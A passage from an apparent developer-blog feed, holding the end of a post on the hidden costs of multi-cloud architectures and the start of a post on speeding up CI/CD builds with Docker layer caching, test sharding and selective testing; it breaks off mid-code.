&lt;p&gt;A typical microservices architecture making 50M cross-cloud API calls per month with average 10KB payloads generates ~500GB of egress, which is only about $45/month at that rate. Chatty API traffic is the small end of the problem; the bills that hurt come from bulk data moving between YOUR OWN services.&lt;/p&gt;

&lt;p&gt;One UK fintech we audited was spending $8,400/month purely on data transfer between their AWS analytics pipeline and their GCP ML training cluster. They'd budgeted $0 for this line item.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; If you must go multi-cloud, keep tightly coupled services on the same provider. Only split at natural boundaries where data transfer is minimal — like running your marketing site on one cloud and your core product on another.&lt;/p&gt;
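&lt;p&gt;It's worth running this arithmetic for your own call volumes before committing to a split. A back-of-envelope sketch, using AWS's $0.09/GB internet-egress rate as the reference:&lt;/p&gt;

```python
def monthly_egress_cost(calls_per_month, payload_kb, rate_per_gb=0.09):
    """Estimate cross-cloud egress cost from API call volume and payload size."""
    gb = calls_per_month * payload_kb / 1_000_000  # decimal KB to GB
    return gb * rate_per_gb

# 50M calls at 10KB each is 500 GB: about $45/month.
# Bulk flows are the killer: 90 TB/month of pipeline traffic is $8,100/month.
```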

&lt;h3&gt;
  
  
  2. Tooling Sprawl: Three of Everything
&lt;/h3&gt;

&lt;p&gt;Multi-cloud means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Three different IAM systems (AWS IAM, GCP IAM, Azure AD)&lt;/li&gt;
&lt;li&gt;Three different monitoring stacks (CloudWatch, Cloud Monitoring, Azure Monitor)&lt;/li&gt;
&lt;li&gt;Three different networking models (VPC, VPC, VNet)&lt;/li&gt;
&lt;li&gt;Three different secret management tools (Secrets Manager, Secret Manager, Key Vault)&lt;/li&gt;
&lt;li&gt;Three different container orchestration flavors (EKS, GKE, AKS)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each requires training, documentation, and ongoing maintenance. Your ops team doesn't become 3x more efficient — they become 3x more fragmented.&lt;/p&gt;

&lt;p&gt;We tracked the tooling cost for a 200-person engineering org running multi-cloud. The additional licensing, training, and context-switching overhead: &lt;strong&gt;$340,000/year&lt;/strong&gt; beyond what single-cloud would have cost.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; If you go multi-cloud, standardize on cloud-agnostic tooling: Terraform (not CloudFormation/Deployment Manager), Prometheus (not provider-native monitoring), HashiCorp Vault (not provider-native secrets). This reduces — but doesn't eliminate — the sprawl.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Skill Fragmentation: Nobody Knows Everything
&lt;/h3&gt;

&lt;p&gt;Your senior engineer is an AWS expert. She can debug VPC peering issues in her sleep. Put her on a GCP networking problem and she's Googling basic concepts.&lt;/p&gt;

&lt;p&gt;Multi-cloud requires either:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Generalists&lt;/strong&gt; who know all three clouds at a surface level (dangerous for production issues), or&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Specialists&lt;/strong&gt; for each cloud (expensive — you're tripling your senior ops headcount)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In practice, most teams end up with one cloud where they're experts and two where they're dangerous. Guess which ones have the production incidents.&lt;/p&gt;

&lt;p&gt;A Wall Street fintech (pre-IPO, 150 engineers) told us their mean time to resolution for incidents increased 3.2x after going multi-cloud — not because the systems were more complex, but because the on-call engineer often wasn't fluent in the cloud where the incident occurred.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Be honest about your team's depth. If you have 3 people who know AWS cold, that's your primary cloud. Period. Adding GCP "for ML" sounds great until your ML pipeline goes down at 2am and nobody on-call knows how GCP IAM works.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The Vendor Lock-In Irony
&lt;/h3&gt;

&lt;p&gt;The entire premise of multi-cloud is avoiding vendor lock-in. The irony: multi-cloud creates a DIFFERENT kind of lock-in that's harder to escape.&lt;/p&gt;

&lt;p&gt;When you build a cloud-agnostic abstraction layer to work across providers, you're locked into your abstraction layer. When you choose Kubernetes as your portable runtime, you're locked into Kubernetes. When you standardize on Terraform, you're locked into Terraform.&lt;/p&gt;

&lt;p&gt;These aren't bad choices — but they're trade-offs, not escapes. You've traded vendor lock-in for architectural lock-in.&lt;/p&gt;

&lt;p&gt;The real question isn't "how do we avoid lock-in?" It's "which lock-in has the best exit cost?"&lt;/p&gt;

&lt;p&gt;Using AWS-native services (Lambda, DynamoDB, SQS) locks you into AWS. But migrating off AWS is a known, well-documented process. Migrating off a custom multi-cloud abstraction layer that nobody outside your company understands? That's the real lock-in.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Accept lock-in as a spectrum. Choose the provider that best fits your primary workload. Use their native services. If you ever need to migrate (most companies never do), the cost is predictable and bounded.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Compliance Multiplication
&lt;/h3&gt;

&lt;p&gt;SOC 2, ISO 27001, GDPR, PCI DSS — every compliance framework requires you to document and audit your infrastructure. Multi-cloud means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Three sets of compliance documentation&lt;/li&gt;
&lt;li&gt;Three sets of audit trails&lt;/li&gt;
&lt;li&gt;Three different security posture assessments&lt;/li&gt;
&lt;li&gt;Three different incident response procedures (because each cloud's tooling is different)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For a Series B startup going through SOC 2 for the first time, single-cloud compliance takes ~4 months. Multi-cloud? We've seen it take 8-10 months because the auditors need to review each provider separately.&lt;/p&gt;

&lt;p&gt;UK-based firms dealing with FCA regulations and GDPR simultaneously find this particularly painful — the data residency requirements alone triple the documentation burden in multi-cloud setups.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; If compliance is a significant part of your business (fintech, healthtech, govtech), single-cloud simplifies your life dramatically. The compliance cost difference alone often exceeds any negotiation leverage you'd gain from multi-cloud.&lt;/p&gt;

&lt;h2&gt;
  
  
  When Multi-Cloud Actually Makes Sense
&lt;/h2&gt;

&lt;p&gt;We're not anti-multi-cloud. There are legitimate cases:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Acquisitions.&lt;/strong&gt; You bought a company running on GCP. You're on AWS. Forcing immediate migration is riskier than running both. This is the most common valid multi-cloud scenario.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Best-of-breed specific services.&lt;/strong&gt; GCP's BigQuery for analytics + AWS for everything else. This is "multi-cloud lite" — and it works because the boundary is clean and the data transfer is batch, not real-time.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Regulatory requirements.&lt;/strong&gt; Some government contracts require workloads on specific providers. No choice.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Genuine disaster recovery.&lt;/strong&gt; If AWS goes down entirely (it has happened — us-east-1, 2017), having a warm standby on another cloud provides real resilience. But this costs 40-60% more than single-cloud DR.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What We Recommend Instead
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;For most companies under $50M ARR:&lt;/strong&gt; Single cloud, native services, invest the savings in product engineering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For enterprise ($50M+ ARR):&lt;/strong&gt; Single primary cloud + one secondary for specific workloads (ML, analytics, or DR). Never three.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For everyone:&lt;/strong&gt; Calculate the TOTAL cost of multi-cloud — not just compute, but egress, tooling, people, compliance, and incident response. Then compare it honestly to single-cloud + the actual risk of vendor lock-in (hint: the risk is lower than the multi-cloud vendors want you to believe).&lt;/p&gt;

&lt;p&gt;The best cloud strategy isn't the most resilient one. It's the one your team can actually operate.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Multi-Cloud Audit Checklist
&lt;/h2&gt;

&lt;p&gt;Before making any cloud strategy decision, run through this checklist. We use it with every client engagement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost audit:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;[ ] Calculate actual cross-cloud egress fees for the last 3 months (not estimated — actual)&lt;/li&gt;
&lt;li&gt;[ ] List every cloud-specific tool in use across all providers, with licensing cost&lt;/li&gt;
&lt;li&gt;[ ] Count headcount hours spent on multi-cloud-specific work (not cloud work generally — specifically work that exists BECAUSE you're multi-cloud)&lt;/li&gt;
&lt;li&gt;[ ] Add compliance overhead: how many extra weeks did your last audit take because of multi-cloud?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Skills audit:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;[ ] For each cloud provider, list engineers with production-level expertise (can debug a 2am outage without Googling basics)&lt;/li&gt;
&lt;li&gt;[ ] Calculate on-call coverage gaps: are there shifts where nobody fluent in Provider X is available?&lt;/li&gt;
&lt;li&gt;[ ] Estimate training cost to bring all engineers to production-level on all providers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Architecture audit:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;[ ] Map every cross-cloud data flow with estimated monthly transfer volume&lt;/li&gt;
&lt;li&gt;[ ] Identify services that could move to a single cloud without architectural changes&lt;/li&gt;
&lt;li&gt;[ ] List services that genuinely benefit from being on a specific provider (e.g., BigQuery on GCP)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Risk audit:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;[ ] Document the actual probability of needing to leave your primary cloud provider (hint: for most companies, it's &amp;lt;1% per year)&lt;/li&gt;
&lt;li&gt;[ ] Calculate the cost of a full provider migration — not as a scary number, but as a bounded, plannable project&lt;/li&gt;
&lt;li&gt;[ ] Compare that migration cost to your annual multi-cloud overhead&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If your annual multi-cloud overhead exceeds the amortized migration risk by more than 2x, you're paying for insurance that costs more than the thing it insures.&lt;/p&gt;
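&lt;p&gt;That comparison is a one-liner. A sketch with illustrative placeholder numbers:&lt;/p&gt;

```python
def overhead_to_risk_ratio(annual_overhead, migration_cost, annual_exit_probability):
    """Ratio of yearly multi-cloud overhead to the amortized migration risk.

    A ratio above ~2 means the 'insurance' costs more than the risk it
    covers. The 2x threshold is a rule of thumb, not a law.
    """
    amortized_risk = migration_cost * annual_exit_probability
    return annual_overhead / amortized_risk

# $200K/year overhead vs a $1M migration at 1%/year exit probability: ratio 20.
```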

&lt;h2&gt;
  
  
  Mistakes We See Repeatedly
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;"We'll use Terraform so we're portable."&lt;/strong&gt; Terraform abstracts cloud APIs, but your application still uses provider-specific services. Porting a Terraform config from AWS to GCP means rewriting every resource block. Terraform makes you portable between Terraform versions, not between clouds.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"Our Kubernetes layer makes us cloud-agnostic."&lt;/strong&gt; EKS, GKE, and AKS are all Kubernetes, but the networking, storage, IAM, and load balancing layers are completely different. We've seen teams spend 6 months "porting" a Kubernetes deployment between clouds — the pods were easy, everything around them was a rewrite. This is the same kind of hidden cost we document in our &lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;self-hosted LLM infrastructure analysis&lt;/a&gt; — the headline number looks simple, the operational reality is not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"Multi-cloud gives us negotiation leverage."&lt;/strong&gt; In theory. In practice, cloud sales teams know exactly which services you use and how sticky they are. Your leverage comes from being willing to migrate, which requires having migration-ready architecture — and that's expensive to maintain. Most companies get better discounts from committing to a single provider via Reserved Instances or Committed Use Discounts than from threatening to leave.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"We need multi-cloud for compliance."&lt;/strong&gt; Sometimes true — government contracts may require specific providers. But most compliance frameworks (SOC 2, ISO 27001, GDPR) are provider-agnostic. They care about your controls, not which cloud you run on. We've seen companies go multi-cloud "for compliance" when what they actually needed was better &lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;secret management&lt;/a&gt; and access control on a single provider.&lt;/p&gt;

&lt;h2&gt;
  
  
  Frequently Asked Questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Q: We already have multi-cloud. Is it worth consolidating?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Run the audit checklist above first. If your annual multi-cloud overhead (egress + tooling + people + compliance) exceeds $200K, consolidation probably pays for itself within 12-18 months. The migration cost is real but bounded — and you stop paying the overhead permanently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: What if AWS has a major outage? Don't we need multi-cloud for DR?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Major regional outages are rare (once every 2-3 years) and typically last 2-8 hours. Calculate the cost of that downtime versus the annual cost of maintaining a warm standby on another cloud. For most companies under $100M ARR, the math favors accepting the risk. For companies where 4 hours of downtime costs more than $500K, multi-cloud DR is justified — but only for DR, not for daily operations.&lt;/p&gt;
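&lt;p&gt;The same expected-value framing applies here. A sketch (the inputs are yours to fill in; the outage frequency above suggests a few hours of downtime per year on average):&lt;/p&gt;

```python
def standby_worth_it(outage_cost_per_hour, expected_hours_down_per_year,
                     standby_annual_cost):
    """True when a cross-cloud warm standby costs less than the downtime it prevents."""
    expected_loss = outage_cost_per_hour * expected_hours_down_per_year
    return expected_loss > standby_annual_cost
```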

&lt;h2&gt;
  
  
  Related Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;Self-Hosted LLMs vs API: Cost Comparison&lt;/a&gt; — the same hidden-cost analysis applied to AI infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;Build vs Buy Framework&lt;/a&gt; — how to decide whether to build cloud-agnostic abstractions or use native services&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;Secret Management Best Practices&lt;/a&gt; — managing credentials across multiple cloud providers is a nightmare; here's how to do it properly&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;We help engineering teams audit their cloud architecture and make data-driven decisions about their infrastructure strategy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;Talk to us about your cloud strategy →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Subscribe to our newsletter for weekly deep-dives into infrastructure decisions that save real money.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>CI/CD Pipeline Optimization: From 20-Minute to 3-Minute Builds</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 28 Apr 2026 06:00:06 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/cicd-pipeline-optimization-from-20-minute-to-3-minute-builds-2d1h</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/cicd-pipeline-optimization-from-20-minute-to-3-minute-builds-2d1h</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  CI/CD Pipeline Optimization: From 20-Minute to 3-Minute Builds
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;Real numbers from a startup that cut build times by 85% — every step with code.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem: 20 Minutes of Watching Spinners
&lt;/h2&gt;

&lt;p&gt;Our CI pipeline was 20 minutes. On a busy day with 30+ PRs, that meant 10 hours of cumulative CI time. Developers context-switched while waiting. Reviews stalled. Deployments backed up.&lt;/p&gt;

&lt;p&gt;We're a 12-person team running 84 Docker containers on self-hosted infrastructure. Our stack: Python + TypeScript + Go microservices, GitHub Actions CI, Docker-based deploys, PostgreSQL + Redis.&lt;/p&gt;

&lt;p&gt;Every optimization below is free. No paid CI tools. No enterprise cache services. Just configuration changes and architectural decisions.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 6 Changes That Got Us to 3 Minutes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Docker Layer Caching (Saved: 6 minutes)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Before:&lt;/strong&gt; Every build pulled fresh base images and reinstalled all dependencies.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# BAD: invalidates cache on every code change&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; python:3.12-slim&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; . /app&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;After:&lt;/strong&gt; Separate dependency installation from code changes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# GOOD: dependencies cached until requirements.txt changes&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; python:3.12-slim&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; requirements.txt /app/&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; . /app&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In GitHub Actions, enable BuildKit cache:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build&lt;/span&gt;
  &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;docker/build-push-action@v5&lt;/span&gt;
  &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.&lt;/span&gt;
    &lt;span class="na"&gt;cache-from&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type=gha&lt;/span&gt;
    &lt;span class="na"&gt;cache-to&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type=gha,mode=max&lt;/span&gt;
    &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; First build unchanged. Subsequent builds skip the 6-minute dependency installation step entirely. Cache hit rate: ~92%.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Parallel Test Sharding (Saved: 5 minutes)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Before:&lt;/strong&gt; 847 tests running sequentially: 8 minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;After:&lt;/strong&gt; Split across 4 parallel runners using pytest-split:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;strategy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;matrix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;shard&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;1&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;2&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;3&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;4&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Run tests&lt;/span&gt;
    &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;pytest --splits 4 --group ${{ matrix.shard }} \&lt;/span&gt;
        &lt;span class="s"&gt;--splitting-algorithm least_duration&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;least_duration&lt;/code&gt; algorithm uses historical test timing data to balance shards evenly. We store timing data in &lt;code&gt;.test_durations&lt;/code&gt; committed to the repo.&lt;/p&gt;
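
&lt;p&gt;Conceptually, &lt;code&gt;least_duration&lt;/code&gt; is greedy bin packing: take tests longest-first and always hand the next one to the currently lightest shard. A toy sketch of the idea, not pytest-split's actual implementation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;# Greedy shard balancing: longest tests first, each to the lightest shard.
durations = {"test_auth": 90, "test_api": 60, "test_billing": 45,
             "test_ui": 30, "test_utils": 15}

shards = [{"tests": [], "total": 0} for _ in range(2)]
for name, secs in sorted(durations.items(), key=lambda kv: -kv[1]):
    lightest = min(shards, key=lambda s: s["total"])
    lightest["tests"].append(name)
    lightest["total"] += secs

print([s["total"] for s in shards])  # [120, 120]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
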

&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; 8 minutes → 2.5 minutes (longest shard). Parallelism consumes more total runner minutes, since four concurrent jobs each repeat checkout and setup, but wall-clock time dropped 68%.&lt;/p&gt;

&lt;p&gt;For Indian startups on GitHub's free tier (2,000 minutes/month), this is a real trade-off. We sidestep it by self-hosting our runners on the same bare-metal server as our staging environment (more on that in step 6).&lt;/p&gt;
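
&lt;p&gt;The billing trade-off is easy to model. A sketch in which the per-shard setup overhead is an assumed figure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;# Wall-clock vs billed minutes when splitting an 8-minute suite 4 ways.
sequential_min = 8.0
shard_count = 4
per_shard_setup = 0.5   # checkout + dependency restore, repeated on every shard

wall_clock = sequential_min / shard_count + per_shard_setup
billed = shard_count * wall_clock
print(f"wall-clock: {wall_clock} min, billed: {billed} min")  # 2.5 and 10.0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
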

&lt;h3&gt;
  
  
  3. Dependency Pre-Build with Docker Compose (Saved: 3 minutes)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Before:&lt;/strong&gt; Every microservice built its own &lt;code&gt;node_modules&lt;/code&gt; or &lt;code&gt;venv&lt;/code&gt; from scratch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;After:&lt;/strong&gt; A shared base image with pre-installed dependencies, rebuilt only when lockfiles change.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# docker-compose.ci.yml&lt;/span&gt;
&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deps-python&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.&lt;/span&gt;
      &lt;span class="na"&gt;dockerfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Dockerfile.deps-python&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;registry.local/deps-python:latest&lt;/span&gt;

  &lt;span class="na"&gt;service-api&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./services/api&lt;/span&gt;
      &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;BASE_IMAGE&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;registry.local/deps-python:latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# Dockerfile.deps-python&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; python:3.12-slim&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; requirements/*.txt /deps/&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; /deps/base.txt &lt;span class="nt"&gt;-r&lt;/span&gt; /deps/test.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A separate nightly CI job rebuilds the deps image. Feature branch builds pull it from our local registry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; Eliminated redundant dependency installation across 6 Python services. Saved ~3 minutes per build.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Smart Test Selection (Saved: 2 minutes)
&lt;/h3&gt;

&lt;p&gt;Not every commit needs every test. We built a simple mapper:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/scripts/test_selector.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pathlib&lt;/span&gt;

&lt;span class="n"&gt;changed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;check_output&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;git&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;diff&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;--name-only&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;origin/main...HEAD&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;test_map&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
